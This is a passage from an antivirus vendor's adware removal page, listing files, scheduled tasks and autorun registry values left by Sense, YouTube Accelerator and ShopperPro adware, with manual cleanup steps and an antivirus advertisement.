      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\1.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\177.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\44.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\4.js (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\goopdateres_en.dll (26 bytes)
      %Program Files%\Sense\Sense-bho.dll (3361 bytes)
      %WinDir%\Tasks\temp_ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\43.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[2].json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\28.js (536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\246.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\93.js (793 bytes)
      %Program Files%\Sense\Uninstall.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\41.js (2 bytes)
      %Program Files%\Sense\1293297481.mxaddon (1552 bytes)
      %WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-5.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\496520 (283214 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\183.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\223.js (453 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\192.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateHelper.msi (32 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\233.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\230233 (1072587 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsi28.tmp (384226 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\78.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\46.js (2 bytes)
      %Program Files%\Sense\Sense-codedownloader.exe (3073 bytes)
      %Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-5.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\180.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\195.js (378 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\94.js (1 bytes)
      %Program Files%\Sense\Sense-bg.exe (4185 bytes)
      %Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.exe (13122 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\211.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\102.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\40.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins.json (16 bytes)
      %Program Files%\Sense\360-48292.crx (1425 bytes)
      %WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-1.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\nsisos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\42.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\13.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\207.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\239.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\226.js (400 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\230.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\extension.js (613 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\md5dll.dll (6 bytes)
      %Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.exe (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\104.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\91.js (5520 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\37.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\72.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\21.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\45.js (1 bytes)
      %Program Files%\Sense\utils.exe (67653 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\193.js (797 bytes)
      %Program Files%\Sense\background.html (729 bytes)
      %WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.job (74 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\155.js (449 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\184.js (1 bytes)
      %Program Files%\Sense\Sense.ico (15 bytes)
      %Program Files%\Sense\Sense-buttonutil.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\64.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\22.js (8 bytes)
      %Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\244.js (501 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\220.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\103.js (2 bytes)
      %WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.job (70 bytes)
      %Program Files%\Sense\Sense-buttonutil.exe (1425 bytes)
      %WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\cr.exe (75854 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\sense.exe (112865 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\iwebar.exe (75524 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\yta.exe (64704 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\sm.exe (65527 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\shopperpro.exe (27635 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SMALLTEST[1].HTM (167 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\SMALLTEST[1].htm (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\rules[1].json (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[2] (40 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CAAVY7YL.gif (35 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\0[1].htm (49 bytes)
      %WinDir%\Tasks\YTAUpdate.job (264 bytes)
      %WinDir%\Tasks\YTAUpdate_logon.job (264 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\un_smw.exe (5617 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsC.tmp (6 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smw.sys (962 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smoi32.dll (9345 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smu.exe (38576 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smi32.exe (3472 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\AccDownload.dll (12028 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsExec.dll (6 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\SBIEBrowserHelperObject.dll (20 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\sma.exe (2495 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\System.dll (11 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smci32.dll (25002 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smfi32.dll (15177 bytes)
      %Program Files%\Common Files\Goobzo\GBUpdate\smei32.dll (19492 bytes)
      %WinDir%\Tasks\ShopperPro.job (2150 bytes)
      %Documents and Settings%\All Users\Application Data\ShopperPro\config.json (473 bytes)
      %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
      %Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.json (6 bytes)
      %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3073 bytes)
      %Program Files%\ShopperPro\config.json (473 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\0[1].htm (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\483925[1].txt (50457 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\483924[1].txt (43505 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\646958[1].txt (73 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\376579[1].txt (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\196378[1].txt (37009 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\rules[1].json (941 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\534129[1].txt (769 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\353989[1].txt (44065 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\183015[1].txt (31745 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA3I8N3P.gif (35 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\353990[1].txt (45857 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\353991[1].txt (457 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\WrapperUtils.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Qcdxs.tmp (186350 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Ixesxgrajdtli.exe (733418 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nss16.tmp (197150 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (34057 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\DcryptDll.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup1.exe (32128 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup.exe (346568 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\NK.lky (16 bytes)
      %Program Files%\YouTube Accelerator\instlsp.log (253 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\4CC07.dmp (306250 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rules[1].json (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[1] (40 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\0[1].htm (49 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA14G7PL.gif (35 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Ecixv.exe (727822 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk10.tmp (198024 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Bmpdzenp.tmp (185551 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\WrapperUtils.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\app_code[1].js (457 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dealply_m[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bpo_intext_m[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\monetizationLoader[1].js (72929 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\superfish_no_coupons_m[1].js (759 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].js (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\similar_products_m[1].js (48329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\plugins[1].json (4585 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\adextent_m[1].js (431 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie[1].js (491 bytes)

    5. Delete the following value(s) in the autorun key (How to Work with System Registry):

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "GOOBZOYouTubeAccelerator" = "%Program Files%\YouTube Accelerator\YouTubeAccelerator.exe"

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "GOOBZOYouTubeAccelerator" = "%Program Files%\YouTube Accelerator\YouTubeAccelerator.exe /startup"

    6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    7. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    No votes yet

    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now